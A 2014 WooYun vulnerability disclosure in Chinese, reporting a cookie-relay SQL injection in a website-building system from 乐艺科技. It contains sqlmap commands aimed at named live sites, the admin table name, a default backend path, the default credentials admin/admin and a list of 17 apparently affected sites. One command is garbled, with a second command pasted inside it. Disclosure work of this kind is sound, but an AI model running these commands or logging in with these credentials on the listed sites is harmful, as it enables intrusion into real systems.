当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-079842

漏洞标题:某通用建站系统cookie中转注入

相关厂商:乐艺科技

漏洞作者: 路人甲

提交时间:2014-10-21 12:51

修复时间:2015-01-19 12:52

公开时间:2015-01-19 12:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-21: 细节已通知厂商并且等待厂商处理中
2014-10-26: 厂商已经确认,细节仅向厂商公开
2014-10-29: 细节向第三方安全合作伙伴开放
2014-12-20: 细节向核心白帽子及相关领域专家公开
2014-12-30: 细节向普通白帽子公开
2015-01-09: 细节向实习白帽子公开
2015-01-19: 细节向公众公开

简要描述:

rt

详细说明:

google关键字:技术支持:乐艺科技(有点多)
一个叫乐艺科技的公司的建站系统 有过滤但用的是通用防注入,可以cookie中转注入

LU@{@377RD]@Z]L))SPVUTG.jpg


一看就感觉是通用防注入
经验证,这个公司建的站基本都是通用防注入,所以都可以cookie中转注入,所有参数都行,就随便挑参数验证
证明:
1.sqlmap.py -u "http://www.szzel.com/product.asp" --cookie "sqlmap.py -u "http://www.yunyvision.com/case.asp" --cookie "ncid=19" --level 2 -Tncid=19" --level 2

7_1R40(UCIWHMC[UE~8Z{Z3.jpg


8VT%U9{}3U)IKZ(4_FLSBPD.jpg


}H2JHOI9BFA%PO1_AG7Z}00.jpg


管理员表名是:sd_admin
2.
sqlmap.py -u "http://www.yunyvision.com/case.asp" --cookie "ncid=19" --level 2

AR`W)3FXSENZQOVFWG4~]5E.jpg


看了一下 基本都是这些一样的表,里面存着管理员密码 就不一一跑了证明通用即可
默认后台:lesiure/index.asp 解密管理员密码 admin admin
登陆后台:

8K$2XKYVOVN37`IOUZP$PFX.jpg


付收集的网址:
www.szzel.com/
www.shcwine.com
www.yunyvision.com
www.xiangshanmall.com
www.cipon.net
www.qmgg.com.cn
www.oulang.net
www.asieris.cn
www.lemsz.com
www.sunrous.com
www.jsyl155.com
www.sz-sjbx68.com
euweili.w28.mc-test.com
www.txjybg.com
www.szwsxn.com
www.szxyyt.com
www.txbjnjb.com

漏洞证明:

google关键字:技术支持:乐艺科技(有点多)
一个叫乐艺科技的公司的建站系统 有过滤但用的是通用防注入,可以cookie中转注入

LU@{@377RD]@Z]L))SPVUTG.jpg


一看就感觉是通用防注入
经验证,这个公司建的站基本都是通用防注入,所以都可以cookie中转注入,所有参数都行,就随便挑参数验证
证明:
1.sqlmap.py -u "http://www.szzel.com/product.asp" --cookie "sqlmap.py -u "http://www.yunyvision.com/case.asp" --cookie "ncid=19" --level 2 -Tncid=19" --level 2

7_1R40(UCIWHMC[UE~8Z{Z3.jpg


8VT%U9{}3U)IKZ(4_FLSBPD.jpg


}H2JHOI9BFA%PO1_AG7Z}00.jpg


管理员表名是:sd_admin
2.
sqlmap.py -u "http://www.yunyvision.com/case.asp" --cookie "ncid=19" --level 2

AR`W)3FXSENZQOVFWG4~]5E.jpg


看了一下 基本都是这些一样的表,里面存着管理员密码 就不一一跑了证明通用即可
默认后台:lesiure/index.asp 解密管理员密码 admin admin
登陆后台:

8K$2XKYVOVN37`IOUZP$PFX.jpg


付收集的网址:
www.szzel.com/
www.shcwine.com
www.yunyvision.com
www.xiangshanmall.com
www.cipon.net
www.qmgg.com.cn
www.oulang.net
www.asieris.cn
www.lemsz.com
www.sunrous.com
www.jsyl155.com
www.sz-sjbx68.com
euweili.w28.mc-test.com
www.txjybg.com
www.szwsxn.com
www.szxyyt.com
www.txbjnjb.com

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2014-10-26 00:04

厂商回复:

最新状态:

暂无


漏洞评价:

评论